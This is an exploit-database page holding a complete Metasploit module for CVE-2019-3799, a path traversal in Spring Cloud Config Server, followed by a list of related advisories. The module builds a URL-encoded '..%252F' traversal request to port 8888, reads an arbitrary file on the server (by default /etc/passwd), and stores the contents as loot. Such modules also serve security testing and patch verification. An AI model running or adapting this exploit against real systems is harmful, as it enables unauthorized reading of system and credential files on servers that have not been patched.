Lucene search
Dhiraj Mishra1337DAY-ID-32632HistoryMay 01, 2019 - 12:00 a.m.
Spring Cloud Config 2.1.x - Path Traversal Exploit
2019-05-0100:00:00
Dhiraj Mishra
0day.today
24
EPSS
0.026
Percentile
90.3%
Exploit for java platform in category web applications
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Spring Cloud Config Server Directory Traversal',
'Description' => %q{
This module exploits an unauthenticated directory traversal
vulnerability
which exists in Spring Cloud Config versions 2.1.x prior to 2.1.2,
versions 2.0.x prior to 2.0.4, and versions 1.4.x prior to 1.4.6.
Spring
Cloud Config listens by default on port 8888.
},
'References' =>
[
['CVE', '2019-3799'],
['URL', 'https://pivotal.io/security/cve-2019-3799']
],
'Author' =>
[
'Vern', # Vulnerability discovery
'Dhiraj Mishra' # Metasploit module
],
'DisclosureDate' => '2019-04-17',
'License' => MSF_LICENSE
))
register_options(
[
Opt::RPORT(8888),
OptString.new('FILEPATH', [true, "The path to the file to read",
'/etc/passwd']),
OptInt.new('DEPTH', [ true, 'Depth for Path Traversal', 13 ])
])
end
def data
Rex::Text.rand_text_alpha(3..8)
end
def run_host(ip)
filename = datastore['FILEPATH']
traversal = "#{"..%252F" * datastore['DEPTH']}#{filename}"
uri = "/#{data}/#{data}/master/#{traversal}"
res = send_request_raw({
'method' => 'GET',
'uri' => uri
})
unless res && res.code == 200
print_error('Nothing was downloaded')
return
end
vprint_good("#{peer} - #{res.body}")
path = store_loot(
'springcloud.traversal',
'text/plain',
ip,
res.body,
filename
)
print_good("File saved in: #{path}")
end
end
# 0day.today [2019-05-02] #Related
redhatcve
redhatcve
CVE-2019-3799
2019-05-13 08:25:09
cvelist
cvelist
CVE-2019-3799 Directory Traversal with spring-cloud-config-server
2019-05-06 15:21:37
packetstorm
packetstorm
Spring Cloud Config Server Directory Traversal
2024-09-01 00:00:00
Spring Cloud Config 2.1.x Path Traversal
2019-04-30 00:00:00
exploitpack
exploitpack
Spring Cloud Config 2.1.x - Path Traversal (Metasploit)
2019-04-30 00:00:00
metasploit
metasploit
Spring Cloud Config Server Directory Traversal
2019-04-18 07:24:34
veracode
veracode
Directory Traversal
2019-04-17 09:12:42
nuclei
nuclei
Spring Cloud Config Server - Local File Inclusion
2020-06-22 13:35:37
cve
cve
CVE-2019-3799
2019-05-06 16:29:01
exploitdb
exploitdb
Spring Cloud Config 2.1.x - Path Traversal (Metasploit)
2019-04-30 00:00:00
nvd
nvd
CVE-2019-3799
2019-05-06 16:29:01
osv
osv
Path Traversal in Spring Cloud Config
2019-05-23 08:39:23
CVE-2019-3799
2019-05-06 16:29:01
myhack58
myhack58
prion
prion
Directory traversal
2019-05-06 16:29:00
github
github
Path Traversal in Spring Cloud Config
2019-05-23 08:39:23
openvas
openvas
Generic HTTP Directory Traversal (Web Dirs) - Active Check
2021-07-22 00:00:00
oracle
oracle
Oracle Critical Patch Update Advisory - April 2022
2022-04-19 00:00:00